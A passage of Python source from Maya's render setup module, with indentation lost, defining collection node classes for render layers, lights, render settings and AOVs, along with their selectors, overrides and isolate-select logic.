kInvalidChildName = maya.stringTable['y_collection.kInvalidChildName' ]
kUnknownChild = maya.stringTable['y_collection.kUnknownChild' ]
kOverrideCreationFailed = maya.stringTable['y_collection.kOverrideCreationFailed' ]
kCollectionMissingSelector = maya.stringTable['y_collection.kCollectionMissingSelector' ]
kRendererMismatch = maya.stringTable['y_collection.kRendererMismatch' ]
kIncorrectChildType = maya.stringTable['y_collection.kIncorrectChildType' ]
# List of undo messages
kChildAttached = maya.stringTable['y_collection.kChildAttached' ]
kChildDetached = maya.stringTable['y_collection.kChildDetached' ]
kSet = maya.stringTable['y_collection.kSet' ]
def collections(c):
return c.getCollections()
class Collection(nodeList.ListBase, childNode.TreeOrderedItem,
childNode.ChildNode):
"""
Collection node.
A collection has an ordered list of children, and a selector to
determine nodes to which the children apply.
MAYA-59277:
- When we start implementing proper hierarchical collections we
need to decide on the relationship between parent and child
selectors. Do we always consider a parent collection to be the
union of its child collections, and propagate the selector
information upwards when a child collection is added or changed?
Or do we go the opposite direction and restrict the child collection
to use the intersection between its selector and its parent's selector?
- Light child collections always have a single light source member.
We should utilize this and create a specific selector for such
use cases for better performance.
"""
kTypeId = typeIDs.collection
kTypeName = 'collection'
# Attributes for collection as list of children.
#
# Connections to lowest-priority and highest-priority child
# on children linked list. The lowest-priority child
# is considered to be the front of the list, and the highest-priority
# child the back of the list.
childLowest = OpenMaya.MObject()
childHighest = OpenMaya.MObject()
# Connection to all children in the list.
children = OpenMaya.MObject()
# Attribute for message connection to selector node associated with the
# collection. This attribute is a destination, as only one selector
# can be associated with each collection.
aSelector = OpenMaya.MObject()
# Enabled behavior. See enabled module for documentation.
enabled = OpenMaya.MObject()
selfEnabled = OpenMaya.MObject()
parentEnabled = OpenMaya.MObject()
# isolateSelected flag as attribute
isolateSelected = OpenMaya.MObject()
# The number of isolate selected children in a collection's subtree.
numIsolatedChildren = OpenMaya.MObject()
# The number of isolate selected ancestors of this collection.
numIsolatedAncestors = OpenMaya.MObject()
# the SimpleSelector is the default.
kDefaultSelectorTypeName = selector.SimpleSelector.kTypeName
@staticmethod
def creator():
return Collection()
@staticmethod
def initializer():
# A collection is a render layer list element.
# inheritAttributesFrom() must be called before adding any other
# attributes.
Collection.inheritAttributesFrom(nodeList.ListItem.kTypeName)
# A collection is a list of children.
Collection.children = Collection.initListItems()
Collection.childLowest = utils.createDstMsgAttr(
'childLowest', 'cl')
Collection.addAttribute(Collection.childLowest)
Collection.childHighest = utils.createDstMsgAttr(
'childHighest', 'ch')
Collection.addAttribute(Collection.childHighest)
Collection.aSelector = utils.createDstMsgAttr('selector', 'sel')
Collection.addAttribute(Collection.aSelector)
# Set up enabled attribute.
computeEnabled.initializeAttributes(Collection)
# Add isolateSelected attribute
Collection.numIsolatedChildren = computeEnabled.createNumIsolatedChildrenAttribute()
Collection.addAttribute(Collection.numIsolatedChildren)
Collection.numIsolatedAncestors = computeEnabled.createHiddenIntAttribute(
"numIsolatedAncestors", "nia")
Collection.addAttribute(Collection.numIsolatedAncestors)
# Add isolateSelected attribute
numAttrFn = OpenMaya.MFnNumericAttribute()
Collection.isolateSelected = numAttrFn.create("isolateSelected", "is", OpenMaya.MFnNumericData.kBoolean, 0)
numAttrFn.storable = True
numAttrFn.keyable = False
numAttrFn.readable = True
numAttrFn.writable = True
numAttrFn.hidden = True
OpenMaya.MPxNode.addAttribute(Collection.isolateSelected)
Collection.attributeAffects(Collection.numIsolatedChildren, Collection.enabled)
Collection.attributeAffects(Collection.numIsolatedAncestors, Collection.enabled)
Collection.attributeAffects(Collection.isolateSelected, Collection.enabled)
def __init__(self):
super(Collection, self).__init__()
self._enabledDirty = False
self._callbackIds = []
def postConstructor(self):
# Call parent class postConstructor
super(Collection, self).postConstructor()
# Listen to changes in the enabled attribute.
self._callbackIds = computeEnabled.addChangeCallbacks(self)
def typeId(self):
return Collection.kTypeId
def typeName(self):
return Collection.kTypeName
def _createSelector(self, parent=None, selArgs=None):
"""Create a selector node, and attach it to the collection.
parent is an optional parent collection. This method must be
overridden by derived classes."""
self.setSelectorType(parent.getSelector().kTypeName if parent else \
self.kDefaultSelectorTypeName)
if parent:
self.getSelector().minimalClone(parent.getSelector())
def _createAndConnectSelector(self, typeName, selArgs=None):
"""Engine method for _createSelector.
selArgs is an optional dictionary passed to _createSelectorNode."""
newSelector = self._createSelectorNode(
typeName, self.name()+'Selector', selArgs)
cmds.connectAttr(newSelector + '.c', self.name() + '.selector')
def _createSelectorNode(self, typeName, selectorName, selArgs):
"""Create the selector node.
Can be overridden by derived classes."""
return cmds.createNode(typeName, name=selectorName, skipSelect=True)
def getSelectorType(self):
try: return self.getSelector().kTypeName
except: return None
def setSelectorType(self, typeName):
'''Sets the selector type of this collection.'''
if self.getSelectorType() == typeName:
return
with undo.NotifyCtxMgr("Set selector type", self._selectorChanged):
children = [child for child in self.getChildren() if isinstance(child, Collection)]
# need to disconnect all selector children
# otherwise they get deleted along with their parent selector
for child in children:
child.getSelector().setParent(None)
try: self._deleteSelector()
except: pass
self._createAndConnectSelector(typeName)
parent = self.parent()
selector = self.getSelector()
if isinstance(parent, Collection):
selector.setParent(parent.getSelector())
for child in children:
child.getSelector().setParent(selector)
def _deleteSelector(self):
selector = self.getSelector()
cmds.disconnectAttr(selector.name() + '.c', self.name() + '.selector')
utils.deleteNode(selector)
def _getInputAttr(self, attr, dataBlock=None):
return dataBlock.inputValue(attr) if dataBlock else OpenMaya.MPlug(self.thisMObject(), attr)
def _getSelfEnabledPlug(self):
return OpenMaya.MPlug(self.thisMObject(), Collection.selfEnabled)
def _getIsolatePlug(self):
return OpenMaya.MPlug(self.thisMObject(), Collection.isolateSelected)
def hasIsolatedAncestors(self, dataBlock=None):
return self._getInputAttr(self.numIsolatedAncestors, dataBlock).asInt() > 0
def hasIsolatedChildren(self, dataBlock=None):
return self._getInputAttr(self.numIsolatedChildren, dataBlock).asInt() > 0
def compute(self, plug, dataBlock):
if plug == self.enabled:
# We are enabled if:
#
# o The normal enabled computation is true (self enabled is true AND
# parent enabled is true).
#
# AND
#
# o We're in batch mode OR
# o No node is isolated OR
# o This node is isolated OR
# o This node has isolate selected children OR
# o This node has isolate selected ancestors.
#
value = computeEnabled.computeEnabled(self, dataBlock) and \
(cmds.about(batch=True) or \
dataBlock.inputValue(self.layerNumIsolatedChildren).asInt()==0 or \
self.isIsolateSelected(dataBlock) or \
self.hasIsolatedAncestors(dataBlock) or \
self.hasIsolatedChildren(dataBlock))
computeEnabled.setEnabledOutput(self, dataBlock, value)
def enabledChanged(self):
layer = self.getRenderLayer()
if layer:
layer._enabledChanged(self)
self.itemChanged()
def isEnabled(self, dataBlock=None):
return self._getInputAttr(self.enabled, dataBlock).asBool()
def isSelfEnabled(self, dataBlock=None):
return self._getInputAttr(self.selfEnabled, dataBlock).asBool()
def setSelfEnabled(self, value):
if value != self.isSelfEnabled():
# pulling isEnabled will trigger enabledChanged
# (no matter if enable output value has changed or not)
with undo.NotifyCtxMgr("Set Override Enabled",self.isEnabled):
cmds.setAttr(self.name()+".selfEnabled", 1 if value else 0)
@guard.state(computeEnabled.isPulling, computeEnabled.setPulling, True)
def pullEnabled(self):
# This will force pulling the enabled plug on overrides. It solves
# the problem of connection overrides not being applied / unapplied
# when not visible in the RenderSetup window; being visible in the
# RenderSetup window causes enabled to be pulled.
#
# Connection overrides are not part of the network; they are a
# procedure that must be run on enable change to modify the
# network. Therefore, the enabled plug is not pulled, contrary to
# value overrides that get inserted in the network, and thus we
# need to force the plug to be pulled.
# Two phase procedure to avoid DG cycle check warnings. First,
# pull on enabled output of connection overrides.
needsUpdate = set()
for n in traverse.depthFirst(self, traverse.nodeListChildren):
if isinstance(n, override.Override) and n.updateOnEnabledChanged():
# Call isEnabled to force computation of the enabled output.
n.isEnabled()
needsUpdate.add(n)
# Second, update the connection override. This will iterate over
# the connection override apply nodes, which query the connection
# override enabled state we've finished computing above. Had we
# done the override enabled computation and the update in the same
# call, we would have gotten a DG evaluation cycle (compute
# enabled, cause update, which queries enabled).
for o in needsUpdate:
o.update()
def getRenderLayer(self):
# For hierarchical collections the parent
# could be another collection, otherwise
# the parent is always the render layer
parent = self.parent()
if isinstance(parent, Collection):
return parent.getRenderLayer()
return parent
def isolateSelectedChanged(self):
layer = self.getRenderLayer()
if layer:
layer._isolateSelectedChanged(self)
def isIsolateSelected(self, dataBlock=None):
""" Get if isolate selected. Will always return False in batch mode """
return False if cmds.about(batch=True) else self._getInputAttr(self.isolateSelected, dataBlock).asBool()
def setIsolateSelected(self, val):
if val!=self.isIsolateSelected() and not cmds.about(batch=True):
with undo.NotifyCtxMgr(kSet % (self.name(), 'isolateSelected', val), self.isolateSelectedChanged):
# Use a command to support the undo mechanism
cmds.setAttr(self._getIsolatePlug().name(), val)
self._updateIsolateSelected(1 if val else -1)
def _findSubcollectionForType(self, typeName):
'''Finds the subcollection of this collection that will handle that typeName
or creates it and returns it if it doesn't exist.'''
filterType, customFilter = selector.Filters.getFiltersFor(typeName)
def predicate(child):
if not isinstance(child, Collection):
return False
sel = child.getSelector()
return sel.kTypeName == selector.SimpleSelector.kTypeName and \
sel.getPattern() == "*" and \
len(sel.staticSelection) == 0 and \
sel.getFilterType() == filterType and \
(filterType != selector.Filters.kCustom or sel.getCustomFilterValue() == customFilter)
def creator():
name = self.name() + "_" + selector.Filters.names.get(filterType, customFilter)
col = create(name)
col.setSelectorType(selector.SimpleSelector.kTypeName)
sel = col.getSelector()
sel.setPattern('*')
sel.setFilterType(filterType)
sel.setCustomFilterValue(customFilter)
return col
return self.findChild(predicate, creator)
@undo.chunk('Create and append an override')
def createOverride(self, overrideName, overrideType):
""" Add an override to the Collection using its node type id or type name."""
# Note: No need to propagate the change notification
# as an empty override does not affect the collection
over = override.create(overrideName, overrideType)
if not over:
raise Exception(kOverrideCreationFailed % overrideName)
# special handle for shader override as they apply to shading engines
# => create subcollection of shading engines if we're in a dag only collection
from maya.app.renderSetup.model.connectionOverride import ShaderOverride
if over.typeId() != typeIDs.shaderOverride or \
self.getSelector().acceptsType('shadingEngine'):
self.appendChild(over)
else:
self._findSubcollectionForType('shadingEngine').appendChild(over)
return over
def _getOverrideType(self, plg, overrideType):
'''Returns the override type that should be created for the given
plg in the given collection (self). Overrides that can't be relative will become absolute.'''
return plg.overrideType(overrideType)
@undo.chunk('Create and append an override')
def _createOverride(self, plg, overrideType):
over = override.create(plg.attributeName, self._getOverrideType(plg, overrideType))
if not over:
raise Exception(kOverrideCreationFailed % attrName)
over.finalize(plg.name)
typeName = OpenMaya.MFnDependencyNode(plg.node()).typeName
collection = self if self.getSelector().acceptsType(typeName) else \
self._findSubcollectionForType(typeName)
collection.appendChild(over)
return over
@undo.chunk('Create and append an absolute override')
def createAbsoluteOverride(self, nodeName, attrName):
""" Add an absolute override to a collection """
return self._createOverride(plug.Plug(nodeName,attrName), typeIDs.absOverride)
@undo.chunk('Create and append a relative override')
def createRelativeOverride(self, nodeName, attrName):
""" Add a relative override to a collection """
return self._createOverride(plug.Plug(nodeName,attrName), typeIDs.relOverride)
@undo.chunk('Create and append a child collection')
def _createCollection(self, collectionName, typeName):
col = create(collectionName, typeName, parent=self)
self.appendChild(col)
return col
def createCollection(self, collectionName):
""" Add a child collection to the Collection. """
return self._createCollection(collectionName, Collection.kTypeName)
def _childAttached(self, child):
'''Perform work to attach a child.
The child has already been added to collection's list when this
method is called.'''
with undo.NotifyCtxMgr(kChildAttached % (self.name(), child.name()), self.itemChanged):
# Once inserted, hook up the child's parentEnabled input to our
# enabled output. Use existing command for undo / redo purposes.
cmds.connectAttr(self.name() + '.enabled',
child.name() + '.parentEnabled')
if isinstance(child, Collection):
child.getSelector().setParent(self.getSelector())
child._attach(self.getRenderLayer())
layer = self.getRenderLayer()
if layer:
layer.descendantAdded(child)
def _detachChild(self, child):
'''Perform work to detach a child.
The child has not yet been removed from the collection's list when
this method is called.'''
with undo.NotifyCtxMgr(kChildDetached % (self.name(), child.name()), self.itemChanged):
# Disconnect the child's parentEnabled input from our enabled
# output. Use existing command for undo / redo purposes.
childParentEnabled = child.name() + '.parentEnabled'
cmds.disconnectAttr(self.name() + '.enabled', childParentEnabled)
# Child parentEnabled will retain its last value, so set it
# to True in case the collection gets parented to the render layer.
cmds.setAttr(childParentEnabled, 1)
if isinstance(child, Collection):
child.getSelector().setParent(None)
child._detach(self.getRenderLayer())
def _attach(self, layer):
"""Attach this collection."""
self._connectLayerIsolatedChildren(layer)
# Number of isolated children doesn't change when we attach.
# Update isolated children of our ancestors.
self._updateAncestorsIsolatedChildren(
self.getNumIsolatedChildren(includeSelf=True))
# Update isolated ancestors of ourselves and our children.
self._updateChildrenIsolatedAncestors(
self.getNumIsolatedAncestors(), includeSelf=True)
def _detach(self, layer):
"""Detach this collection."""
self._disconnectLayerIsolatedChildren(layer)
# Number of isolated children doesn't change when we detach.
# Update isolated children of our ancestors.
self._updateAncestorsIsolatedChildren(
-self.getNumIsolatedChildren(includeSelf=True))
# Update isolated ancestors of ourselves and our children.
self._updateChildrenIsolatedAncestors(
-self.getNumIsolatedAncestors(), includeSelf=True)
@undo.chunk('Append to collection')
def appendChild(self, child):
""" Add a child as the highest-priority child."""
if child.typeId()==RenderSettingsCollection.kTypeId \
or child.typeId()==LightsCollection.kTypeId:
raise RuntimeError(kIncorrectChildType % child.typeName())
nodeList.append(self, child)
self._childAttached(child)
@undo.chunk('Attach to collection')
def attachChild(self, pos, child):
""" Attach a child at a specific position. """
if child.typeId()==RenderSettingsCollection.kTypeId \
or child.typeId()==LightsCollection.kTypeId:
raise RuntimeError(kIncorrectChildType % child.typeName())
nodeList.insert(self, pos, child)
self._childAttached(child)
@undo.chunk('Detach from collection')
def detachChild(self, child):
""" Detach a child whatever its position. """
unapply(child) # NoOp if not applied; otherwise commands are used
# Must perform detach operations before removing from list,
# otherwise parenting information is gone.
self._detachChild(child)
nodeList.remove(self, child)
def getChildren(self, cls=childNode.ChildNode):
""" Get the list of all children.
Optionally only the children matching the given class. """
return list(nodeList.forwardListNodeClassGenerator(self, cls))
def hasChildren(self):
return self.findChild(lambda child: True) is not None
def getCollections(self):
return self.getChildren(cls=Collection)
def getCollectionByName(self, collectionName, nested=False):
for collection in nodeList.forwardListNodeClassGenerator(self, cls=Collection):
if collection.name() == collectionName:
return collection
elif nested:
collection2 = collection.getCollectionByName(collectionName, True)
if collection2:
return collection2
return None
def findChild(self, predicate, creator=None):
'''Find the child of this collection satisfying the predicate function or creates it
with the creator function if not found and a creator function is specified.
Function signatures are:
predicate(childNode): returns boolean.
creator(void) : returns the created node.'''
for child in nodeList.forwardListNodeClassGenerator(self, childNode.ChildNode):
if predicate(child):
return child
if not creator:
return None
child = creator()
self.appendChild(child)
return child
def getChild(self, childName, cls=childNode.ChildNode):
""" Look for an existing child by name and optionally class.
@type childName: string
@param childName: Name of child to look for
@type cls: class name
@param cls: Class name for the type of class to look for
@rtype: Child model instance
@return: Found instance or throw an exception
"""
if not childName:
raise Exception(kInvalidChildName)
for child in nodeList.forwardListNodeClassGenerator(self, cls):
if child.name() == childName:
return child
raise Exception(kUnknownChild % (childName, self.name()))
def isAbstractClass(self):
# Override method inherited from base class: not an abstract class.
return False
def getSelector(self):
"""Return the selector user node for this collection."""
selector = utils.getSrcUserNode(
utils.findPlug(self, Collection.aSelector))
if (selector is None):
raise Exception(kCollectionMissingSelector % self.name())
return selector
@context.applyCollection
def apply(self):
""" Apply all children in this collection. """
with profiler.ProfilerMgr('Collection::apply'):
# Apply all our children to the selection
for child in nodeList.forwardListGenerator(self):
child.apply()
# UI Feedback (progressBar)
RenderLayerSwitchObservable.getInstance().notifyRenderLayerSwitchObserver()
@context.applyCollection
def postApply(self):
'''Post applies all children in this collection. This function may be called to apply a collection (with contained overrides)
after the layer was set visible. It allows inserting new overrides in the currently visible layer
without the need to toggle visibility.'''
with profiler.ProfilerMgr('Collection::postApply'):
# Post apply all our children
for child in nodeList.forwardListGenerator(self):
child.postApply()
@context.unapplyCollection
def unapply(self):
"""Unapply all children in this collection."""
with profiler.ProfilerMgr('Collection::unapply'):
for child in nodeList.reverseListGenerator(self):
child.unapply()
# UI Feedback (progressBar)
RenderLayerSwitchObservable.getInstance().notifyRenderLayerSwitchObserver()
def getOverrides(self):
return self.getChildren(cls=override.Override)
# Collection interface as list of children.
# These methods implement the list requirements for the nodeList module.
#
# The list front and back are destination plugs connected to the child
# node's message plug (which is a source).
def _getFrontAttr(self):
return Collection.childLowest
def _getBackAttr(self):
return Collection.childHighest
def _getListItemsAttr(self):
return Collection.children
def _preChildDelete(self, child):
# Private interface for child to inform its parent that it is
# about to be deleted. Remove the child from our list.
self.detachChild(child)
def _selectedNodesChanged(self):
""" Ownership of this collection or one of its children changed """
layer = self.getRenderLayer()
if layer:
layer._selectedNodesChanged(self)
self.itemChanged()
def _selectorChanged(self):
"""Selector of this collection changed.
Identical to _selectedNodesChanged(), except that the itemChanged()
notification is given with selectorChanged=True."""
layer = self.getRenderLayer()
if layer:
layer._selectedNodesChanged(self)
self.itemChanged(selectorChanged=True)
def _refreshRendering(self):
''' Some changes impose to refresh the rendering for the visible layer only. '''
parent = self.parent()
if parent:
parent._refreshRendering()
def getLayerNumIsolatedChildren(self):
return OpenMaya.MPlug(
self.thisMObject(), Collection.layerNumIsolatedChildren).asInt()
def _getNumIsolatedChildrenPlug(self):
return OpenMaya.MPlug(self.thisMObject(), Collection.numIsolatedChildren)
def getNumIsolatedChildren(self, includeSelf=False):
nic = self._getNumIsolatedChildrenPlug().asInt()
if includeSelf and self.isIsolateSelected():
nic += 1
return nic
def _getNumIsolatedAncestorsPlug(self):
return OpenMaya.MPlug(self.thisMObject(), Collection.numIsolatedAncestors)
def getNumIsolatedAncestors(self):
return self._getNumIsolatedAncestorsPlug().asInt()
# See comments in RenderLayer._updateIsolateSelected.
def _updateNumIsolatedChildren(self, val):
# Use a command to support the undo mechanism
if val != 0:
newVal = self.getNumIsolatedChildren() + val
cmds.setAttr(self._getNumIsolatedChildrenPlug().name(), newVal)
def _updateNumIsolatedAncestors(self, val):
# Use a command to support the undo mechanism
if val != 0:
newVal = self.getNumIsolatedAncestors() + val
cmds.setAttr(self._getNumIsolatedAncestorsPlug().name(), newVal)
def _updateIsolateSelected(self, val):
self._updateAncestorsIsolatedChildren(val)
self._updateChildrenIsolatedAncestors(val)
def _updateAncestorsIsolatedChildren(self, val):
layer = self.getRenderLayer()
if layer:
layer._updateIsolateSelected(val)
for c in self.ancestorCollections():
c._updateNumIsolatedChildren(val)
def _updateChildrenIsolatedAncestors(self, val, includeSelf=False):
# Tell descendants there has been a change in their ancestors'
# isolate select.
for c in traverse.depthFirst(self, collections):
if c is self and not includeSelf:
continue
c._updateNumIsolatedAncestors(val)
def _connectLayerIsolatedChildren(self, layer):
# Connect subtree to layer's isolated children attribute.
if layer:
for c in traverse.depthFirst(self, collections):
c._connectSelfLayerIsolatedChildren(layer)
def _disconnectLayerIsolatedChildren(self, layer):
# Disconnect subtree from layer's isolated children attribute.
if layer:
for c in traverse.depthFirst(self, collections):
c._disconnectSelfLayerIsolatedChildren(layer)
def _connectSelfLayerIsolatedChildren(self, layer):
if layer:
# Use existing command for undo / redo purposes.
cmds.connectAttr(layer.name() + '.numIsolatedChildren',
self.name() + '.parentNumIsolatedChildren')
def _disconnectSelfLayerIsolatedChildren(self, layer):
if layer:
# Use existing command for undo / redo purposes.
cmds.disconnectAttr(layer.name() + '.numIsolatedChildren',
self.name() + '.parentNumIsolatedChildren')
def _importChild(self, childName, nodeType, selArgs=None):
name = cmds.createNode(nodeType, name=childName, skipSelect=True)
child = utils.nameToUserNode(name)
if isinstance(child, Collection):
child._createSelector(None, selArgs)
self.appendChild(child)
return child
def activate(self):
'''
Called when this list item is inserted into the list.
Override this method to do any scene specific initialization.
'''
if len(self._callbackIds) == 0:
self._callbackIds = computeEnabled.addChangeCallbacks(self)
self.getSelector().activate()
def deactivate(self):
'''
Called when this list item is removed from the list.
Override this method to do any scene specific teardown.
'''
# Remove all callbacks.
OpenMaya.MMessage.removeCallbacks(self._callbackIds)
self._callbackIds = []
self.getSelector().deactivate()
def _encodeProperties(self, dict):
super(Collection, self)._encodeProperties(dict)
dict[self._getSelfEnabledPlug().partialName(useLongNames=True)] = self.isEnabled()
dict[self._getIsolatePlug().partialName(useLongNames=True)] = self.isIsolateSelected()
if self.getSelectorType() == selector.BasicSelector.kTypeName: # backward comp with 2016 R2
selectorDict = dict
else:
selectorDict = {}
dict[jsonTranslatorGlobals.SELECTOR_ATTRIBUTE_NAME] = { self.getSelectorType() : selectorDict }
self.getSelector()._encodeProperties(selectorDict)
dict[jsonTranslatorGlobals.CHILDREN_ATTRIBUTE_NAME] = jsonTranslatorUtils.encodeObjectArray(self.getChildren())
def _decodeChildren(self, children, mergeType, prependToName):
jsonTranslatorUtils.decodeObjectArray(children,
jsonTranslatorUtils.MergePolicy(self.getChild,
self._importChild,
mergeType,
prependToName))
def _decodeProperties(self, dict, mergeType, prependToName):
super(Collection, self)._decodeProperties(dict, mergeType, prependToName)
if self._getSelfEnabledPlug().partialName(useLongNames=True) in dict:
self.setSelfEnabled(dict[self._getSelfEnabledPlug().partialName(useLongNames=True)])
if self._getIsolatePlug().partialName(useLongNames=True) in dict:
self.setIsolateSelected(dict[self._getIsolatePlug().partialName(useLongNames=True)])
if jsonTranslatorGlobals.SELECTOR_ATTRIBUTE_NAME not in dict: # backward comp with 2016 R2
self.setSelectorType(selector.BasicSelector.kTypeName)
selectorProperties = dict
else:
selectorType = dict[jsonTranslatorGlobals.SELECTOR_ATTRIBUTE_NAME].keys()[0]
if self.getSelectorType() != selectorType:
self.setSelectorType(selectorType)
selectorProperties = dict[jsonTranslatorGlobals.SELECTOR_ATTRIBUTE_NAME].values()[0]
self.getSelector()._decodeProperties(selectorProperties)
if jsonTranslatorGlobals.CHILDREN_ATTRIBUTE_NAME in dict:
self._decodeChildren(dict[jsonTranslatorGlobals.CHILDREN_ATTRIBUTE_NAME],
mergeType,
prependToName)
def acceptImport(self):
super(Collection, self).acceptImport()
for child in self.getChildren():
child.acceptImport()
def isSelfAcceptableChild(self):
"""Overridden instances that return False, prevent copy/paste of the collection type to itself."""
return True
def isAcceptableChild(self, modelOrData):
""" Check if the model could be a child"""
if isinstance(modelOrData, clipboardData.ClipboardData):
isOverride = modelOrData.typeName() in _overrideTypes
parentTypeName = modelOrData.parentTypeName
else:
isOverride = isinstance(modelOrData, override.Override)
parentTypeName = modelOrData.parent().typeName()
return isOverride and parentTypeName == self.typeName() or (modelOrData.typeName() == self.typeName() and self.isSelfAcceptableChild())
def isTopLevel(self):
"""Is the collection's parent a render layer?"""
# Don't have access to renderLayer.RenderLayer, type check on
# Collection instead.
return not isinstance(self.parent(), Collection)
def ancestorCollections(self):
"""Return this collection's ancestors.
Neither the collection itself, nor the render layer, are included
in the ancestors. Therefore, a top-level collection has no
ancestors."""
parent = self.parent()
while isinstance(parent, Collection):
yield parent
parent = parent.parent()
class LightsCollection(Collection):
"""
LightsCollection node.
A collection node specific for grouping light sources
and overrides on those light sources.
This collection should have all light sources as member by default. All nodes
matching the light classification should be returned by the selector
on this collection.
"""
kTypeId = typeIDs.lightsCollection
kTypeName = 'lightsCollection'
@staticmethod
def creator():
return LightsCollection()
@staticmethod
def initializer():
# Inherit all attributes from parent class
LightsCollection.inheritAttributesFrom(Collection.kTypeName)
def __init__(self):
super(LightsCollection, self).__init__()
def typeId(self):
return LightsCollection.kTypeId
def typeName(self):
return LightsCollection.kTypeName
def _createSelector(self, parent=None, selArgs=None):
self._createAndConnectSelector(selector.SimpleSelector.kTypeName)
# Make it select all light sources in the scene
self.getSelector().setPattern("*")
self.getSelector().setFilterType(selector.Filters.kLights)
def setSelectorType(self, typeName):
raise RuntimeError('Illegal call to derived class method.')
def createCollection(self, collectionName):
""" Add a lights child collection to the Collection. """
return self._createCollection(collectionName, LightsChildCollection.kTypeName)
def isAcceptableChild(self, modelOrData):
"""Check if the argument can be a child of this collection.
We want to prevent copying LightsChildCollections in the same
LightsCollection at the expense of not being able to copy
LightsChildCollections between different LightsCollections.
"""
return False
def compute(self, plug, dataBlock):
computeEnabled.compute(self, plug, dataBlock)
class LightsChildCollection(Collection):
"""
LightsChildCollection node.
A child collection node specific for one single light source
and overrides on this light source.
"""
kTypeId = typeIDs.lightsChildCollection
kTypeName = 'lightsChildCollection'
@staticmethod
def creator():
return LightsChildCollection()
@staticmethod
def initializer():
# Inherit all attributes from parent class
LightsChildCollection.inheritAttributesFrom(Collection.kTypeName)
def __init__(self):
super(LightsChildCollection, self).__init__()
def typeId(self):
return LightsChildCollection.kTypeId
def typeName(self):
return LightsChildCollection.kTypeName
def _createSelector(self, parent=None, selArgs=None):
self._createAndConnectSelector(selector.SimpleSelector.kTypeName)
# Only accepts light sources.
self.getSelector().setFilterType(selector.Filters.kLights)
def setSelectorType(self, typeName):
raise RuntimeError('Illegal call to derived class method.')
def compute(self, plug, dataBlock):
computeEnabled.compute(self, plug, dataBlock)
def isAcceptableChild(self, modelOrData):
"""Check if the argument can be a child of this collection.
Pasting is prevented because the Light Editor considers only the
first override in the LightsChildCollection. Additionally dragging
is prevented between overrides in LightsChildCollections to prevent
dragging between incompatible LightsChildCollection types
(ie. point light, spot light)
"""
return False
class RenderSettingsCollection(Collection):
"""
Render Settings Collection node.
This collection has an ordered list of children, and a static & const selector
to determine nodes to which the children apply. The list of nodes is based
on the selected renderer at the time of creation.
MAYA-66757:
- A base collection will be needed to factorize commonalities and segregate differences.
- A static selector is needed which could be the existing static selection or an object set.
- The name is read-only.
- The selector content is read-only
- The render name should be part of the collection so that the settings are clearly linked
to the used renderer, or linked using a plug
"""
kTypeId = typeIDs.renderSettingsCollection
kTypeName = 'renderSettingsCollection'
# Type of selector created by this collection
kSelectorTypeName = selector.SimpleSelector.kTypeName
@staticmethod
def creator():
return RenderSettingsCollection()
@staticmethod
def initializer():
# A render settings collection is a render layer list element.
# inheritAttributesFrom() must be called before adding any other attributes.
RenderSettingsCollection.inheritAttributesFrom(Collection.kTypeName)
def __init__(self):
super(RenderSettingsCollection, self).__init__()
@staticmethod
def containsNodeName(nodeName):
return nodeName in renderSettings.getDefaultNodes()
def _createSelector(self, parent=None, selArgs=None):
self._createAndConnectSelector(self.kSelectorTypeName)
# Set the default nodes as static selection
# Note: Some renderers could return nodes which do not exist yet.
self.getSelector().staticSelection.setWithoutExistenceCheck(renderSettings.getDefaultNodes())
self.getSelector().setFilterType(selector.Filters.kAll)
def setSelectorType(self, typeName):
raise RuntimeError('Illegal call to derived class method.')
def typeId(self):
return RenderSettingsCollection.kTypeId
def typeName(self):
return RenderSettingsCollection.kTypeName
def appendChild(self, child):
if isinstance(child, Collection):
raise RuntimeError(kIncorrectChildType % child.typeName())
else:
super(RenderSettingsCollection, self).appendChild(child)
def attachChild(self, pos, child):
if isinstance(child, Collection):
raise RuntimeError(kIncorrectChildType % child.typeName())
else:
super(RenderSettingsCollection, self).attachChild(pos, child)
def _createCollection(self, collectionName, typeName):
raise RuntimeError(kIncorrectChildType % typeName)
def compute(self, plug, dataBlock):
computeEnabled.compute(self, plug, dataBlock)
def isAcceptableChild(self, modelOrData):
"""Check if the argument can be a child of this collection.
No collection of any kind can be a child of this collection."""
return modelOrData.typeName() not in _collectionTypes and \
super(RenderSettingsCollection, self).isAcceptableChild(modelOrData)
def _getOverrideType(self, plg, overrideType):
overrideType = super(RenderSettingsCollection, self)._getOverrideType(plg, overrideType)
return typeIDs.absUniqueOverride if overrideType == typeIDs.absOverride else typeIDs.relUniqueOverride
class AOVCollection(Collection):
"""
AOV (arbitrary output variable) parent collection node.
"""
kTypeId = typeIDs.aovCollection
kTypeName = 'aovCollection'
@staticmethod
def creator():
return AOVCollection()
@staticmethod
def initializer():
# An AOV collection is a render layer list element.
# inheritAttributesFrom() must be called before adding any other attributes.
AOVCollection.inheritAttributesFrom(Collection.kTypeName)
def __init__(self):
super(AOVCollection, self).__init__()
@staticmethod
def containsNodeName(nodeName):
callbacks = rendererCallbacks.getCallbacks(rendererCallbacks.CALLBACKS_TYPE_AOVS)
try:
callbacks.getAOVName(nodeName)
return True
except:
return False
def _createSelector(self, parent=None, selArgs=None):
# Selector type name argument is ignored.
self._createAndConnectSelector('')
def _createSelectorNode(self, typeName, selectorName, selArgs):
# Ignore the argument selector type name: get the AOV collection
# selector from the AOV renderer callback.
callbacks = rendererCallbacks.getCallbacks(rendererCallbacks.CALLBACKS_TYPE_AOVS)
return callbacks.getCollectionSelector(selectorName)
def setSelectorType(self, typeName):
raise RuntimeError('Illegal call to derived class method.')
def typeId(self):
return AOVCollection.kTypeId
def typeName(self):
return AOVCollection.kTypeName
def appendChild(self, child):
if isinstance(child, Collection) and not isinstance(child, AOVChildCollection):
raise RuntimeError(kIncorrectChildType % child.typeName())
else:
super(AOVCollection, self).appendChild(child)
def attachChild(self, pos, child):
if isinstance(child, Collection) and not isinstance(child, AOVChildCollection):
raise RuntimeError(kIncorrectChildType % child.typeName())
else:
super(AOVCollection, self).attachChild(pos, child)
# This should never be called, as AOVCollections are created in renderLayer.py in aovCollectionInstance()
def _createCollection(self, collectionName, typeName):
raise RuntimeError(kIncorrectChildType % typeName)
def compute(self, plug, dataBlock):
computeEnabled.compute(self, plug, dataBlock)
class AOVChildCollection(Collection):
"""
AOV (arbitrary output variable) Child Collection node.
"""
kTypeId = typeIDs.aovChildCollection
kTypeName = 'aovChildCollection'
@staticmethod
def creator():
return AOVChildCollection()
@staticmethod
def initializer():
# Inherit all attributes from parent class
AOVChildCollection.inheritAttributesFrom(Collection.kTypeName)
def __init__(self):
super(AOVChildCollection, self).__init__()
def containsNodeName(self, nodeName):
